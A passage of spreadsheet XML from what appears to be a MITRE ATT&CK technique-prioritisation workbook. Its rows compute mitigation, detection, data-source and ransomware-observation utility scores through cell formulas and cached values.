        <v>0</v>
      </c>
      <c r="N460" s="51">
        <v>0</v>
      </c>
      <c r="O460" s="51">
        <v>1</v>
      </c>
      <c r="P460" s="51">
        <v>0</v>
      </c>
      <c r="Q460" s="51">
        <v>0</v>
      </c>
      <c r="R460" s="51"/>
      <c r="S460" s="51">
        <v>0</v>
      </c>
      <c r="T460" s="51"/>
      <c r="U460" s="51">
        <v>0</v>
      </c>
      <c r="V460" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W460">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X460">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y460">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z460">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA460">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB460">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC460" s="29" t="s">
        <v>127</v>
      </c>
      <c r="AD460" s="25" t="str" cm="1">
        <f t="array" ref="AD460">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC460)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE460" s="25">
        <f>IF(AD460="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF460" s="25" t="str" cm="1">
        <f t="array" ref="AF460">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC460)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG460" s="25">
        <f>IF(AF460="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH460" s="25" t="str" cm="1">
        <f t="array" ref="AH460">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC460)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI460" s="25">
        <f>IF(AH460="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ460" s="25" t="str" cm="1">
        <f t="array" ref="AJ460">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC460)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK460" s="25">
        <f>IF(AJ460="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL460" s="25" t="str" cm="1">
        <f t="array" ref="AL460">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC460)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM460" s="25">
        <f>IF(AL460="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN460" s="60">
        <v>0</v>
      </c>
      <c r="AO460" s="51">
        <v>0</v>
      </c>
      <c r="AP460" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3933333333333334E-2</v>
      </c>
      <c r="AQ460" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.6444444444444448E-2</v>
      </c>
      <c r="AR460" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.6444444444444448E-2</v>
      </c>
      <c r="AS460" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT460" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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61" spans="1:47" ht="32.1">
      <c r="A461" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.255047619047619E-2</v>
      </c>
      <c r="B461" s="25">
        <f>SUM(H461,M461,V461)*(1+SUM(AE461,AG461,AI461,AK461,AM461))</f>
        <v>0.1255047619047619</v>
      </c>
      <c r="C461" s="25" t="s">
        <v>1695</v>
      </c>
      <c r="D461" s="25" t="s">
        <v>1696</v>
      </c>
      <c r="E461" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F461" s="51">
        <v>1</v>
      </c>
      <c r="G461" s="51">
        <v>1</v>
      </c>
      <c r="H461" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I461">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J461">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K461">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L461">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M461" s="25">
        <v>0</v>
      </c>
      <c r="N461" s="51">
        <v>1</v>
      </c>
      <c r="O461" s="51">
        <v>0</v>
      </c>
      <c r="P461" s="51">
        <v>0</v>
      </c>
      <c r="Q461" s="51">
        <v>0</v>
      </c>
      <c r="R461" s="51"/>
      <c r="S461" s="51">
        <v>0</v>
      </c>
      <c r="T461" s="51"/>
      <c r="U461" s="51">
        <v>0</v>
      </c>
      <c r="V461" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W461">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X461">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y461">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z461">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA461">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB461">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC461" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD461" s="25" t="str" cm="1">
        <f t="array" ref="AD461">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC461)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE461" s="25">
        <f>IF(AD461="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF461" s="25" t="str" cm="1">
        <f t="array" ref="AF461">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC461)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG461" s="25">
        <f>IF(AF461="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH461" s="25" t="str" cm="1">
        <f t="array" ref="AH461">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC461)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI461" s="25">
        <f>IF(AH461="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ461" s="25" t="str" cm="1">
        <f t="array" ref="AJ461">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC461)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK461" s="25">
        <f>IF(AJ461="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL461" s="25" t="str" cm="1">
        <f t="array" ref="AL461">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC461)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM461" s="25">
        <f>IF(AL461="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN461" s="62">
        <v>0</v>
      </c>
      <c r="AO461" s="51">
        <v>1</v>
      </c>
      <c r="AP461" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.255047619047619E-2</v>
      </c>
      <c r="AQ461" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.1834920634920635E-2</v>
      </c>
      <c r="AR461" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.1834920634920635E-2</v>
      </c>
      <c r="AS461" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT461" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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62" spans="1:47" ht="32.1">
      <c r="A462" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.0476190476190476E-2</v>
      </c>
      <c r="B462" s="25">
        <f>SUM(H462,M462,V462)*(1+SUM(AE462,AG462,AI462,AK462,AM462))</f>
        <v>0.10476190476190476</v>
      </c>
      <c r="C462" s="25" t="s">
        <v>1697</v>
      </c>
      <c r="D462" s="25" t="s">
        <v>309</v>
      </c>
      <c r="E462" s="25" t="s">
        <v>1698</v>
      </c>
      <c r="F462" s="51">
        <v>1</v>
      </c>
      <c r="G462" s="51">
        <v>1</v>
      </c>
      <c r="H462" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I462">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J462">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K462">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L462">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M462" s="25">
        <v>0</v>
      </c>
      <c r="N462" s="51">
        <v>0</v>
      </c>
      <c r="O462" s="51">
        <v>0</v>
      </c>
      <c r="P462" s="51">
        <v>0</v>
      </c>
      <c r="Q462" s="51">
        <v>1</v>
      </c>
      <c r="R462" s="51"/>
      <c r="S462" s="51">
        <v>0</v>
      </c>
      <c r="T462" s="51"/>
      <c r="U462" s="51">
        <v>0</v>
      </c>
      <c r="V462" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W462">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X462">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y462">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z462">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA462">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB462">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC462" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD462" s="25" t="str" cm="1">
        <f t="array" ref="AD462">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC462)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE462" s="25">
        <f>IF(AD462="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF462" s="25" t="str" cm="1">
        <f t="array" ref="AF462">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC462)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG462" s="25">
        <f>IF(AF462="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH462" s="25" t="str" cm="1">
        <f t="array" ref="AH462">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC462)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI462" s="25">
        <f>IF(AH462="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ462" s="25" t="str" cm="1">
        <f t="array" ref="AJ462">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC462)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK462" s="25">
        <f>IF(AJ462="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL462" s="25" t="str" cm="1">
        <f t="array" ref="AL462">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC462)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM462" s="25">
        <f>IF(AL462="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN462" s="60">
        <v>0</v>
      </c>
      <c r="AO462" s="51">
        <v>0</v>
      </c>
      <c r="AP462" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.0476190476190476E-2</v>
      </c>
      <c r="AQ462" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.4920634920634921E-2</v>
      </c>
      <c r="AR462" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.4920634920634921E-2</v>
      </c>
      <c r="AS462" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT462" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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63" spans="1:47">
      <c r="A463" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.255047619047619E-2</v>
      </c>
      <c r="B463" s="25">
        <f>SUM(H463,M463,V463)*(1+SUM(AE463,AG463,AI463,AK463,AM463))</f>
        <v>0.1255047619047619</v>
      </c>
      <c r="C463" s="25" t="s">
        <v>1699</v>
      </c>
      <c r="D463" s="25" t="s">
        <v>205</v>
      </c>
      <c r="E463" s="25" t="s">
        <v>1700</v>
      </c>
      <c r="F463" s="51">
        <v>1</v>
      </c>
      <c r="G463" s="51">
        <v>1</v>
      </c>
      <c r="H463" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I463">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J463">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K463">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L463">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M463" s="25">
        <v>0</v>
      </c>
      <c r="N463" s="51">
        <v>0</v>
      </c>
      <c r="O463" s="51">
        <v>1</v>
      </c>
      <c r="P463" s="51">
        <v>0</v>
      </c>
      <c r="Q463" s="51">
        <v>0</v>
      </c>
      <c r="R463" s="51"/>
      <c r="S463" s="51">
        <v>0</v>
      </c>
      <c r="T463" s="51"/>
      <c r="U463" s="51">
        <v>0</v>
      </c>
      <c r="V463" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W463">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X463">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y463">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z463">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA463">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB463">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC463" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD463" s="25" t="str" cm="1">
        <f t="array" ref="AD463">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC463)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE463" s="25">
        <f>IF(AD463="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF463" s="25" t="str" cm="1">
        <f t="array" ref="AF463">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC463)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG463" s="25">
        <f>IF(AF463="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH463" s="25" t="str" cm="1">
        <f t="array" ref="AH463">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC463)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI463" s="25">
        <f>IF(AH463="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ463" s="25" t="str" cm="1">
        <f t="array" ref="AJ463">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC463)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK463" s="25">
        <f>IF(AJ463="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL463" s="25" t="str" cm="1">
        <f t="array" ref="AL463">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC463)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM463" s="25">
        <f>IF(AL463="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN463" s="59">
        <v>0</v>
      </c>
      <c r="AO463" s="51">
        <v>0</v>
      </c>
      <c r="AP463" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.255047619047619E-2</v>
      </c>
      <c r="AQ463" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.1834920634920635E-2</v>
      </c>
      <c r="AR463" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.1834920634920635E-2</v>
      </c>
      <c r="AS463" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT463" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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64" spans="1:47">
      <c r="A464" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.255047619047619E-2</v>
      </c>
      <c r="B464" s="25">
        <f>SUM(H464,M464,V464)*(1+SUM(AE464,AG464,AI464,AK464,AM464))</f>
        <v>0.1255047619047619</v>
      </c>
      <c r="C464" s="25" t="s">
        <v>1701</v>
      </c>
      <c r="D464" s="25" t="s">
        <v>1702</v>
      </c>
      <c r="E464" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F464" s="51">
        <v>1</v>
      </c>
      <c r="G464" s="51">
        <v>1</v>
      </c>
      <c r="H464" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I464">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J464">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K464">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L464">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M464" s="25">
        <v>0</v>
      </c>
      <c r="N464" s="51">
        <v>0</v>
      </c>
      <c r="O464" s="51">
        <v>1</v>
      </c>
      <c r="P464" s="51">
        <v>0</v>
      </c>
      <c r="Q464" s="51">
        <v>0</v>
      </c>
      <c r="R464" s="51"/>
      <c r="S464" s="51">
        <v>0</v>
      </c>
      <c r="T464" s="51"/>
      <c r="U464" s="51">
        <v>0</v>
      </c>
      <c r="V464" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W464">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X464">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y464">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z464">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA464">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB464">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC464" s="29" t="s">
        <v>136</v>
      </c>
      <c r="AD464" s="25" t="str" cm="1">
        <f t="array" ref="AD464">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC464)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE464" s="25">
        <f>IF(AD464="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF464" s="25" t="str" cm="1">
        <f t="array" ref="AF464">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC464)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG464" s="25">
